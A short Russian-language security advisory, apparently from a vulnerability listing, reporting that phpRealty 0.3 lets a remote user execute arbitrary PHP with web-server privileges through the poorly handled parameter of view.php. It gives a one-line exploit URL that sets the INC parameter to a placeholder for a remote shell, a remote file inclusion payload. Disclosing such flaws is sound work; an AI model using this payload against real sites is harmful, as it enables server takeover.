Программа: phpRealty 0.3

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «propID» сценарием view.php. Удаленный пользователь
может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web
сервера.

Эксплоит:

http://[host]/[phprealty-path]/manager/static/view.php?propID=0&INC= [ S H E
L L ] ?



Оставить мнение